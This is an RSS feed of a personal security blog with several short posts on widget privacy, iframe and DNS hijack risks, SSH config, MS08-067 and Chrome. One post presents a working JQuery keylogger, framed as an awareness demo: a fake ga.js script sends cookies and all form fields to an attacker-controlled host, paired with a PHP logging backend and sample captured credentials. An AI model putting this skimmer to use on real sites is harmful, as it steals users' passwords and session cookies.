<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Makl Ndrix &#187; security</title>
	<atom:link href="http://michaelhendrickx.com/category/security/feed" rel="self" type="application/rss+xml" />
	<link>http://michaelhendrickx.com</link>
	<description>may contain traces of nuts</description>
	<lastBuildDate>Thu, 17 May 2012 21:03:03 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.2</generator>
		<item>
		<title>Privacy in a widgeted world</title>
		<link>http://michaelhendrickx.com/201111_privacy-in-a-widgeted-world.html</link>
		<comments>http://michaelhendrickx.com/201111_privacy-in-a-widgeted-world.html#comments</comments>
		<pubDate>Mon, 28 Nov 2011 23:46:34 +0000</pubDate>
		<dc:creator>Michael Hendrickx</dc:creator>
				<category><![CDATA[internet]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://michaelhendrickx.com/?p=519</guid>
		<description><![CDATA[The Internet as we use it today, has very little privacy left. We all say that Facebook and Google know &#8220;too much&#8221;, only to realise that they don&#8217;t know anything aside from what we feed them, or do they? Welcome the &#8220;widget&#8221;. A piece of html (with css, javascript..) to be included in another page, [...]<div class="addthis_toolbox addthis_default_style " addthis:url='http://michaelhendrickx.com/201111_privacy-in-a-widgeted-world.html' addthis:title='Privacy in a widgeted world'  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></description>
			<content:encoded><![CDATA[<p><img src="http://michaelhendrickx.com/wp-content/uploads/2011/11/peek.jpg" alt="" title="peek" width="112" height="168" class="alignright size-full wp-image-520" align="right" />The Internet as we use it today, has very little privacy left.  We all say that Facebook and Google know &#8220;too much&#8221;, only to realise that they don&#8217;t know anything aside from what we feed them, or do they?</p>
<p>Welcome the &#8220;widget&#8221;.  A piece of html (with css, javascript..) to be included in another page, often to socially spread content (<a href="https://developers.facebook.com/docs/reference/plugins/like/">Facebook Like</a>, <a href="http://www.google.com/+1/button/">Google +1</a>, <a href="http://developer.linkedin.com/plugins/share-button">LinkedIN share</a>, etc), or other added value (<a href="http://www.google.com/analytics/">Analytics</a>, sharing, etc) will tell many &#8220;providers&#8221; what content you are accessing.</p>
<p>It is difficult now to find a popular page without any widgets.  Pages pack &#8220;like&#8221; buttons, &#8220;share this&#8221; widgets or <em>tweet</em> options to give you a instant way of sharing their content in your social network &#8211; banking on good &#8216;ole word of mouth marketing.  If your friends like something, you might be interested also, even if it was only for peer pressure.</p>
<p>The problem that when something (such as the widget) is requested, browser data (such as your session&#8217;s information and the referer) also flow to the widget provider&#8217;s webserver.  This provider will know what page you&#8217;re on and usually who you are (assuming you stay logged in into google, twitter, facebook, etc)</p>
<p><img src="http://michaelhendrickx.com/wp-content/uploads/2011/11/ww.jpg" alt="" title="ww" width="591" height="162" class="aligncenter size-full wp-image-521" align="center"/></p>
<p>Thinking &#8220;but if I <em>like</em> a page, facebook will know it <em>anyways</em>&#8220;.  This is true; the problem lies in the fact that providers know you&#8217;re accessing a page, regardless of performing any action (liking, sharing, etc).  If you read X number of pages on a new model smartphone, chances are big you want to buy another one &#8211; and targeted ads become more&#8230; <em>targeted</em>.</p>
<p><img src="http://michaelhendrickx.com/wp-content/uploads/2011/11/mag.jpeg" alt="" title="mag" width="194" height="200" class="alignright size-full wp-image-526" align="right"/>From that advertising point of view, it creates mixed feelings.  It&#8217;s like somebody overlooking your shoulder while you&#8217;re reading a magazine and changes the ads accordingly to which article you were staring at longer.</p>
<p>From a website owner point of view, this does create added value.  If you can convince to have websites publish your widget code, you can track people&#8217;s interests, even before they ever came to your website.  This (unidentifiable) user eventually ends up on your web app, identifies him/her self and you have great information.  I&#8217;m just not sure how ethical this is, and even though Facebook&#8217;s <em>outdated</em> <a href="https://eff.org/r.H7t">law enforcement guidelines</a> don&#8217;t hold &#8220;webpages visited&#8221; in particular, they would have access to it.</p>
<p>Is this such a bad thing?  Perhaps.  &#8220;Widget providers&#8221; offer added value to website owners, who in turn decide what goes into their webpages.  Vague idea, but maybe a browser extension could prevent the loading of these widgets, replacing them with a pseudo equivalent (fake buttons, etc) and only dynamically load the target script upon a click? </p>
<p>Food for thought.  Now, look at the buttons below, they know you&#8217;ve been here already.</p>
]]></content:encoded>
			<wfw:commentRss>http://michaelhendrickx.com/201111_privacy-in-a-widgeted-world.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>JQlog: JQuery Keylogger, or why not to trust your proxy admin.</title>
		<link>http://michaelhendrickx.com/201106_jqlog-jquery-keylogger.html</link>
		<comments>http://michaelhendrickx.com/201106_jqlog-jquery-keylogger.html#comments</comments>
		<pubDate>Mon, 06 Jun 2011 07:55:13 +0000</pubDate>
		<dc:creator>Michael Hendrickx</dc:creator>
				<category><![CDATA[Javascript]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[javascript]]></category>
		<category><![CDATA[jkeylog]]></category>
		<category><![CDATA[jqlog]]></category>
		<category><![CDATA[jquery]]></category>
		<category><![CDATA[key logger]]></category>

		<guid isPermaLink="false">http://michaelhendrickx.com/?p=453</guid>
		<description><![CDATA[Note that this post is for awareness and educational purposes only. I do not encourage, and cannot be held responsible for malicious actions using these tools. The Internet, as it is today, is a mash-up of JavaScript enabled services, often included from external websites. Internet companies offer so-called widgets, which are JavaScript tools that can [...]<div class="addthis_toolbox addthis_default_style " addthis:url='http://michaelhendrickx.com/201106_jqlog-jquery-keylogger.html' addthis:title='JQlog: JQuery Keylogger, or why not to trust your proxy admin.'  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></description>
			<content:encoded><![CDATA[<div style="color:#808080;padding:5px 20px">
<em>Note that this post is for awareness and educational purposes only.  I do not encourage, and cannot be held responsible for malicious actions using these tools.</em></div>
<p>The Internet, as it is today, is a mash-up of JavaScript enabled services, often included from external websites.  Internet companies offer so-called widgets, which are JavaScript tools that can be used in your own page.  Popular examples of this are site analytics (Omniture, Google Analytics, etc) or share-abilities (AddThis, AddToAny, &#8230;).  It&#8217;s by overwriting Javascript libraries on a page, that we can do other things, such as recording keystrokes.</p>
<p>&#8220;Overwriting&#8221; javascript libraries, or rather &#8220;inserting javascript&#8221; can be done in several ways.  Cross Site Scripting is one of them, but for the sake of this blog post, I will act as a malicious proxy administrator, and overwrite the Google Analytics DNS entry (www.google-analytics.com) and &#8220;fake&#8221; the ga.js javascript file.</p>
<p><img src="http://michaelhendrickx.com/wp-content/uploads/2011/06/jq2.jpg" alt="" title="jq(2)" width="627" height="223" class="aligncenter size-full wp-image-459" /></p>
<p>For this, you&#8217;d need only 2 files:</p>
<ul>
<li><a href='http://michaelhendrickx.com/wp-content/uploads/2011/06/ga.js'>Javascript keylogger</a></li>
<li><a href='http://michaelhendrickx.com/wp-content/uploads/2011/06/dump.php_.txt'>PHP backend script</a></li>
</ul>
<p>This javascript file, found <a href='http://michaelhendrickx.com/wp-content/uploads/2011/06/ga.js'>here</a>, holds 3 parts: JQuery, a base64 encoder and the keylogger code itself: <span id="more-453"></span></p>
<div style="border:1px solid #c0c0c0;padding:10px">
<pre>var t = "http://www.google-analytics.com/dump.php?a=";
jQuery(document).ready(function(){
  jQuery("form").submit(function(){
    var o = {};
    o.location = document.location.href;
    o.cookie = document.cookie;
    jQuery(":input").each(function(index){
      o[jQuery(this).attr("name")]=jQuery(this).val()
    });
    var u = t + Base64.encode(JSON.stringify(o));
    jQuery.getScript(u);
  });
});</pre>
</div>
<p>Upon a &#8220;form submit&#8221; event, the current URL, the current cookie and all the page &lt;input&gt; fields are stored in a JSON object.  This is Base64 encoded and passed on to a defined URL (<strong>http://www.google-analytics.com/dump.php?a=</strong> in this above case).</p>
<div style="color:#808080;padding:10px 20px">
<em>Functions such as $.ajax() or $.post() would not work due to cross-domain limitations.  Henceforth, I used $.getScript to pass on the data to an external URL.  </em>
</div>
<p>The data is pushed, in a Base64 encoded JSON object to an external script; dump.php in my case.  This script (<a href='http://michaelhendrickx.com/wp-content/uploads/2011/06/dump.php_.txt'>here</a>) stores the current date, and a dump of all passed on variables in a defined text file.</p>
<div style="border:1px solid #c0c0c0;padding:10px">
<pre>
  $obj = json_decode(base64_decode($_GET["a"]));
  $fileName = "dump.txt";
  $f = fopen($fileName, 'a');
  fwrite($f, "on ".date("d M y, h:i:s")."\n\n");
  foreach($obj as $i=>$j){ fwrite($f, $i." : ".$j."\n"); }
  fwrite($f, "-----------------------------------------------------\n");
  fclose($f);
</pre>
</div>
<p>Since it decodes a JSON object, dump.php will require JSON support, this can be installed using <a href="http://pear.php.net/">pear</a>.  Debian, it&#8217;s done using the following:</p>
<pre>
  apt-get install php-pear
  pear install Services_JSON</pre>
<p>To verify this, you will see a JSON entry in the phpinfo() output.</p>
<p>When all is setup correctly (virtual host, /etc/hosts file changes, correct permissions for the dump.txt file to be created), all &lt;form&gt; submits should be recorded in the text file, in the form of:</p>
<pre style="padding-left:20px">
on 06 Jun 11, 07:28:06
location : http://7days.ae/
cookie : SESS13752b3ab7d6...
<strong>name : user
pass : secret1552</strong>
_empty_ : Password
op :
form_build_id : form-00db26143485eac73953183a0e4170b6
form_id : search_form
search_theme_form : Search Keywords
default_text :
</pre>
<p>No, this is no hack against Google Analytics or 7days, the latter is  something that would <a href="http://michaelhendrickx.com/201104_7days-meta-refresh-hack.html">look slightly different</a>.  <img src='http://michaelhendrickx.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Although this example uses Google Analytics, it could be used for many other &#8220;popular&#8221; javascripts that are included in terms of widgets.  The handy things about Google Analytics is that it&#8217;s invisible to the user whether it is loaded or not.  </p>
<p>Using a proxy server, even a transparent one can have its risks, this post just illustrates one of them.  Always make sure you can trust your proxy administrators.</p>
<p>Thank you,<br />
Michael</p>
<p>PS: these scripts are far from perfect, they don&#8217;t trap XHR requests and many other things, but it gets the point across.</p>
]]></content:encoded>
			<wfw:commentRss>http://michaelhendrickx.com/201106_jqlog-jquery-keylogger.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Widgets or IFrame hacks, how would we know?</title>
		<link>http://michaelhendrickx.com/201101_widgets-or-iframe-hacks-how-would-we-know.html</link>
		<comments>http://michaelhendrickx.com/201101_widgets-or-iframe-hacks-how-would-we-know.html#comments</comments>
		<pubDate>Thu, 13 Jan 2011 06:20:46 +0000</pubDate>
		<dc:creator>Michael Hendrickx</dc:creator>
				<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://michaelhendrickx.com/?p=423</guid>
		<description><![CDATA[A particular aspect in IT security is injecting malware into websites. Often leading to so-called &#8220;drive by downloads&#8220;. This malware is often inserted due to a browser vulnerability which gets executed by, say, Javascript. The latter is usually &#8220;inserted&#8221; in a legitimate website using a hidden &#60;IFRAME&#62; tag or similar. How can this be stopped? [...]<div class="addthis_toolbox addthis_default_style " addthis:url='http://michaelhendrickx.com/201101_widgets-or-iframe-hacks-how-would-we-know.html' addthis:title='Widgets or IFrame hacks, how would we know?'  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></description>
			<content:encoded><![CDATA[<p><img src="http://michaelhendrickx.com/wp-content/uploads/2011/01/bug.jpeg" alt="" title="bug" width="153" height="152" align="right" class="alignright size-full wp-image-424" />A particular aspect in IT security is injecting malware into websites.  Often leading to so-called &#8220;<a href="http://en.wikipedia.org/wiki/Drive-by_download">drive by downloads</a>&#8220;.  This malware is often inserted due to a browser vulnerability which gets executed by, say, Javascript.  The latter is usually &#8220;inserted&#8221; in a legitimate website using a hidden &lt;IFRAME&gt; tag or similar.</p>
<p>How can this be stopped?  Modern websites include, because of widgets, several external Javascripts onto their own sites.  When going to the gadget popular website <strong><a href="http://engadget.com">engadget.com</a></strong>, a total of 17 hosts are contacted&#8230; <span id="more-423"></span></p>
<ul>
<li>engadget.com</li>
<li>blogsmithmedia.com</li>
<li>o.aolcdn.com</li>
<li>platform.twitter.com</li>
<li>b.engadget.com</li>
<li>o.sa.aol.com</li>
<li>h.scorecardresearch.com</li>
<li>blogcdn.com</li>
<li>platform0.twitter.com</li>
<li>urls.api.twitter.com</li>
<li>platform.twitter.com</li>
<li>aolcdn.com</li>
<li>facebook.com</li>
<li>engadget2.disqus.com</li>
<li>static.ak.fbcdn.net</li>
<li>mediacdn.disqus.com</li>
<li>disqus.com</li>
</ul>
<p>Wouldn&#8217;t it be easier for an attacker to -perhaps- perform DNS poisoning to take over one of these hostnames, to include javascripts in multiple websites?  With the [like] buttons, [retweet] buttons and [addthis] widgets, one could target many websites all at once.</p>
<p>Stopping this is partially performed by browsers, such as Firefox&#8217;s &#8220;this site downloads contents from xxxx.com, which contains malicious material&#8221;, but that&#8217;s only after a website is labelled as malicious.  Could there be an answer where websites follow a &#8220;trusted list&#8221; (where sites register the widgets they use) type of model?  </p>
<p>Just wondering on a thursday morning.</p>
]]></content:encoded>
			<wfw:commentRss>http://michaelhendrickx.com/201101_widgets-or-iframe-hacks-how-would-we-know.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Logging into SSH with a different username</title>
		<link>http://michaelhendrickx.com/200903_loggin-into-ssh-with-a-different-username.html</link>
		<comments>http://michaelhendrickx.com/200903_loggin-into-ssh-with-a-different-username.html#comments</comments>
		<pubDate>Thu, 26 Mar 2009 02:59:52 +0000</pubDate>
		<dc:creator>Michael Hendrickx</dc:creator>
				<category><![CDATA[misc]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[sysadmin]]></category>
		<category><![CDATA[web]]></category>

		<guid isPermaLink="false">http://michaelhendrickx.com/?p=138</guid>
		<description><![CDATA[I love SSH. SSH is the de-facto service for remote server management, especially in a CLI environment. Being a avid Linux user, and spending quite a bit of time on OSX lately, I often SSH into several servers remotely. Being subject to &#8220;username conventions&#8221;, you don&#8217;t always share the same username across machines. And I [...]<div class="addthis_toolbox addthis_default_style " addthis:url='http://michaelhendrickx.com/200903_loggin-into-ssh-with-a-different-username.html' addthis:title='Logging into SSH with a different username'  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></description>
			<content:encoded><![CDATA[<p>I love SSH.  SSH is the de-facto service for remote server management, especially in a CLI environment.</p>
<p>Being a avid Linux user, and spending quite a bit of time on OSX lately, I often SSH into several servers remotely.  Being subject to &#8220;username conventions&#8221;, you don&#8217;t always share the same username across machines.  And I always wondered how one could just type <em>ssh hostname</em> instead of providing the username.</p>
<p>Seems that, by creating a <code>.ssh/config</code> file with following contents:</p>
<p><code><br />
Host server.example.com server<br />
&nbsp;&nbsp;User username<br />
</code></p>
<p>WIll make life easier, as you can in the future only do a &#8220;ssh hostname&#8221;.  I didn&#8217;t know this.</p>
]]></content:encoded>
			<wfw:commentRss>http://michaelhendrickx.com/200903_loggin-into-ssh-with-a-different-username.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>MS08-67 released out of the patch cycle, new blaster coming up?</title>
		<link>http://michaelhendrickx.com/200810_ms08-67-released-out-of-the-patch-cycle-new-blaster-coming-up.html</link>
		<comments>http://michaelhendrickx.com/200810_ms08-67-released-out-of-the-patch-cycle-new-blaster-coming-up.html#comments</comments>
		<pubDate>Sat, 25 Oct 2008 03:23:37 +0000</pubDate>
		<dc:creator>Michael Hendrickx</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[windows]]></category>
		<category><![CDATA[worm]]></category>

		<guid isPermaLink="false">http://michaelhendrickx.com/?p=48</guid>
		<description><![CDATA[A newly discovery vulnerability made Microsoft release a security patch aside from it&#8217;s usual cycle, the notorious Patch Tuesday. This &#8220;Patch Tuesday&#8221; is normally every second Tuesday of the month. MS08-067 fixes a bug in the RPC handling of the Windows Server service. The bug was deemed as &#8220;critical&#8221; on pre-Vista machines, which is still [...]<div class="addthis_toolbox addthis_default_style " addthis:url='http://michaelhendrickx.com/200810_ms08-67-released-out-of-the-patch-cycle-new-blaster-coming-up.html' addthis:title='MS08-67 released out of the patch cycle, new blaster coming up?'  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></description>
			<content:encoded><![CDATA[<p><img src="http://michaelhendrickx.com/wp-content/uploads/2008/10/patch.jpg" alt="" title="patch" width="144" height="88" class="alignright size-full wp-image-51" />A newly discovery vulnerability made Microsoft release a security patch  aside from it&#8217;s usual cycle, the notorious Patch Tuesday.  This &#8220;Patch Tuesday&#8221; is normally every second Tuesday of the month.</p>
<p><a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx">MS08-067</a> fixes a bug in the RPC handling of the Windows Server service.  </p>
<p>The bug <a href="http://blogs.technet.com/msrc/archive/2008/10/23/ms08-067-released.aspx">was deemed</a> as &#8220;critical&#8221; on pre-Vista machines, which is still the majority of Windows clients.</p>
]]></content:encoded>
			<wfw:commentRss>http://michaelhendrickx.com/200810_ms08-67-released-out-of-the-patch-cycle-new-blaster-coming-up.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Minimalistic browser, Google&#8217;s Chrome</title>
		<link>http://michaelhendrickx.com/200809_minimalistic-browser-googles-chrome.html</link>
		<comments>http://michaelhendrickx.com/200809_minimalistic-browser-googles-chrome.html#comments</comments>
		<pubDate>Wed, 03 Sep 2008 21:40:15 +0000</pubDate>
		<dc:creator>Michael Hendrickx</dc:creator>
				<category><![CDATA[internet]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[chrome]]></category>
		<category><![CDATA[google]]></category>
		<category><![CDATA[v8]]></category>

		<guid isPermaLink="false">http://michaelhendrickx.com/?p=22</guid>
		<description><![CDATA[Google came out with a new browser, called Chrome. A company that pushes so much into a browser, made their own browser with minimalistic design (as usually done by google) multiple features, such as the incognito windows (wont leave traces in your sites&#8217;s history), the built in javascript console, V8 Javascript engine. See it as [...]<div class="addthis_toolbox addthis_default_style " addthis:url='http://michaelhendrickx.com/200809_minimalistic-browser-googles-chrome.html' addthis:title='Minimalistic browser, Google&#8217;s Chrome'  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></description>
			<content:encoded><![CDATA[<p><img src="http://michaelhendrickx.com/wp-content/uploads/2008/09/chrome.jpg" alt="" title="chrome" width="187" height="74" class="alignright size-full wp-image-24" />Google came out with a new browser, called <a href="http://www.google.com/chrome/intl/en/features.html?hl=en">Chrome</a>.  A company that pushes so much into a browser, made their own browser with minimalistic design (as <a href="http://www.google.com/">usually</a> done by google) multiple features, such as the incognito windows (wont leave traces in your sites&#8217;s history), the built in javascript console, <a href="http://code.google.com/apis/v8/">V8 Javascript engine</a>.</p>
<p>See it as a firefox with your necesarry plugins, in a new jacket.</p>
<p>Very interesting product.  And it seems that places.ae <a href="http://blog.places.ae/2008/09/google-chrome-a-new-browser.html">renders correctly in it</a>, which is probably due to the borrowed Firefox code.</p>
<p>I am afraid that IE(8)&#8217;s days are counted.</p>
<p>Thank you,<br />
Michael</p>
]]></content:encoded>
			<wfw:commentRss>http://michaelhendrickx.com/200809_minimalistic-browser-googles-chrome.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dubai jails yahoo email account hacker</title>
		<link>http://michaelhendrickx.com/200809_dubai-jails-yahoo-email-account-hacker.html</link>
		<comments>http://michaelhendrickx.com/200809_dubai-jails-yahoo-email-account-hacker.html#comments</comments>
		<pubDate>Tue, 02 Sep 2008 20:09:04 +0000</pubDate>
		<dc:creator>Michael Hendrickx</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[uae]]></category>
		<category><![CDATA[dubai]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacker]]></category>

		<guid isPermaLink="false">http://michaelhendrickx.com/?p=18</guid>
		<description><![CDATA[An Egyptian secretary guessed the password of a yahoo account of an Emirati UN employee, and was sentenced to three months in jail and deportation. The &#8220;hacker&#8221; emailed the victim that he broke into her email account, and was going to release pictures and &#8220;other secrets&#8221; of her, according to GulfNews. Not the cybercrime caliber [...]<div class="addthis_toolbox addthis_default_style " addthis:url='http://michaelhendrickx.com/200809_dubai-jails-yahoo-email-account-hacker.html' addthis:title='Dubai jails yahoo email account hacker'  ><a class="addthis_button_facebook_like" fb:like:layout="button_count"></a><a class="addthis_button_tweet"></a><a class="addthis_counter addthis_pill_style"></a></div>]]></description>
			<content:encoded><![CDATA[<p>An Egyptian secretary guessed the password of a yahoo account of an Emirati UN employee, and was sentenced to three months in jail and deportation.</p>
<p>The &#8220;hacker&#8221; emailed the victim that he broke into her email account, and was going to release pictures and &#8220;other secrets&#8221; of her, according to <a href="http://www.gulfnews.com/nation/Police_and_The_Courts/10241859.html">GulfNews</a>.</p>
<p>Not the cybercrime caliber of russian extremist webmasters being <a href="http://www.nytimes.com/2008/09/01/world/europe/01ingushetia.html?_r=1&#038;pagewanted=print&#038;oref=slogin">&#8220;accidentially&#8221; executed</a>, but still.</p>
]]></content:encoded>
			<wfw:commentRss>http://michaelhendrickx.com/200809_dubai-jails-yahoo-email-account-hacker.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

